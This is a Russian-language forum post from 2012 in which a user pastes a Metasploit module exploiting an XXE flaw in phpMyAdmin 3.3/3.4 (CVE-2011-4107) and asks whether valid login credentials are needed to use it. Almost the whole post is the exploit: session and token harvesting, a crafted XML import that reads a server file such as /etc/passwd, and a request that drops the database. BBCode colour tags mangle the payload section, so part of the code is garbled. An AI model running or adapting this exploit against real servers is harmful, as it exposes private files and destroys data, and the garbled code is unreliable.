Показать сообщение отдельно

  #9  
Старый 01.08.2012, 09:07
WendM
Познающий
Регистрация: 29.01.2012
Сообщений: 44
Провел на форуме:
11466

Репутация: 3
По умолчанию

Добрый день. Возник вопрос по этому эксплоиту

phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection

PHP код:
[COLOR="#000000"]require 'msf/core'



class Metasploit3
'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',

'Version' => '1.0',

'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).

The attacker must be logged in to MySQL via phpMyAdmin.

Works on Windows and Linux Versions 3.3.X and 3.4.X},

'References' =>

[

[ 'CVE', '2011-4107' ],

[ 'OSVDB', '76798' ],

[ 'BID', '50497' ],

[ 'URL', 'http://secforce.com/research/'],

],

'Author' => [ 'Marco Batista' ],

'License' => MSF_LICENSE

)



register_options
(

[

Opt::RPORT(80),

OptString.new('FILE', [ true, "File to read", '/etc/passwd']),

OptString.new('USER', [ true, "Username", 'root']),

OptString.new('PASS', [ false, "Password", 'password']),

OptString.new('DB', [ true, "Database to use/create", 'hddaccess']),

OptString.new('TBL', [ true, "Table to use/create and read the file to", 'files']),

OptString.new('APP', [ true, "Location for phpMyAdmin URL", '/phpmyadmin']),

OptString.new('DROP', [ true, "Drop database after reading file?", 'true']),

],self.class)

end



def loginprocess

# HTTP GET TO GET SESSION VALUES

getresponse = send_request_cgi({

'uri' => datastore['APP']+'/index.php',

'method' => 'GET',

'version' => '1.1',

}, 25)



if
(getresponse.nil?)

print_error("no response for #{ip}:#{rport}")

elsif (getresponse.code == 200)

print_status("Received #{getresponse.code} from #{rhost}:#{rport}")

elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)

print_status("Received 302 to #{getresponse.headers['Location']}")

else

print_error
("Received #{getresponse.code} from #{rhost}:#{rport}")

end



valuesget
= getresponse.headers["Set-Cookie"]

varsget = valuesget.split(" ")



#GETTING THE VARIABLES NEEDED

phpMyAdmin = varsget.grep(/phpMyAdmin/).last

pma_mcrypt_iv
= varsget.grep(/pma_mcrypt_iv/).last

# END HTTP GET



# LOGIN POST REQUEST TO GET COOKIE VALUE

postresponse = send_request_cgi({

'uri' => datastore['APP']+'/index.php',

'method' => 'POST',

'version' => '1.1',

'headers' =>{

'Content-Type' => 'application/x-www-form-urlencoded',

'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"

},

'data' => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'

}, 25)



if
(postresponse["Location"].nil?)

print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")

tokenvalue = postresponse.body.split("'").grep(/token/).first.split("
=").last

else

tokenvalue = postresponse["
Location"].split("&").grep(/token/).last.split("=").last

end





valuespost = postresponse.headers["
Set-Cookie"]

varspost = valuespost.split("
")



#GETTING THE VARIABLES NEEDED

pmaUser = varspost.grep(/pmaUser-1/).last

pmaPass = varspost.grep(/pmaPass-1/).last



return "
#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue

# END OF LOGIN POST REQUEST

rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e

print_error
(e.message)

rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e

print_error
(e.message)

end



def readfile
(cookie,tokenvalue)

#READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN

getfiles = send_request_cgi({

'uri' => datastore['APP']+'/export.php',

'method' => 'POST',

'version' => '1.1',

'headers' =>{

'Cookie' => cookie

},

'data' => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'

}, 25)



if
(getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)

print_error("Error reading the file... not enough privilege? login error?")

else

print_status
("#{getfiles.body}")

end

end





def dropdatabase
(cookie,tokenvalue)

dropdb = send_request_cgi({

'uri' => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',

'method' => 'GET',

'version' => '1.1',

'headers' =>{

'Cookie' => cookie

},

}, 25)



print_status
("Dropping database: "+datastore['DB'])

end



def run

cookie
,tokenvalue = loginprocess()



print_status
("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")



craftedXML
= "------WebKitFormBoundary3XPL01T\n"

craftedXML \n"

[/COLOR][COLOR="
#0000BB"]craftedXML[/COLOR][COLOR="#007700"]]>\n"

[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"

[/COLOR][COLOR="
#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"

[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"

[/COLOR][COLOR="
#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"

[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"

[/COLOR][COLOR="
#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"

[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"

[/COLOR][COLOR="
#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"

[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"

[/COLOR][COLOR="
#0000BB"]craftedXML[/COLOR][COLOR="#007700"]&conteudo;\n"

[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"

[/COLOR][COLOR="
#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n"

[/COLOR][COLOR="#0000BB"]craftedXML[/COLOR][COLOR="#007700"]\n\n"

[/COLOR][COLOR="
#0000BB"]craftedXML[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]datastore[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'APP'[/COLOR][COLOR="#007700"]]+[/COLOR][COLOR="#DD0000"]'/import.php'[/COLOR][COLOR="#007700"],

[/COLOR][COLOR="#DD0000"]'method'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'POST'[/COLOR][COLOR="#007700"],

[/
COLOR][COLOR="#DD0000"]'version'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'1.1'[/COLOR][COLOR="#007700"],

[/
COLOR][COLOR="#DD0000"]'headers'[/COLOR][COLOR="#007700"]=>{

[/
COLOR][COLOR="#DD0000"]'Content-Type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T'[/COLOR][COLOR="#007700"],

[/
COLOR][COLOR="#DD0000"]'Cookie'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]cookie

[/COLOR][COLOR="#007700"]},

[/
COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]craftedXML

[/COLOR][COLOR="#007700"]},[/COLOR][COLOR="#0000BB"]25[/COLOR][COLOR="#007700"])



[/COLOR][COLOR="#0000BB"]readfile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]cookie[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]tokenvalue[/COLOR][COLOR="#007700"])



if
([/COLOR][COLOR="#0000BB"]datastore[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DROP'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"true"[/COLOR][COLOR="#007700"])

[/
COLOR][COLOR="#0000BB"]dropdatabase[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]cookie[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]tokenvalue[/COLOR][COLOR="#007700"])

else

[/COLOR][COLOR="#0000BB"]print_status[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Database was not dropped: "[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]datastore[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'DB'[/COLOR][COLOR="#007700"]])

[/COLOR][COLOR="#0000BB"]end



end

end
[/COLOR][/COLOR
Что бы его использовать надо знать верный пароль и логин от phpmyadmin?
 
Ответить с цитированием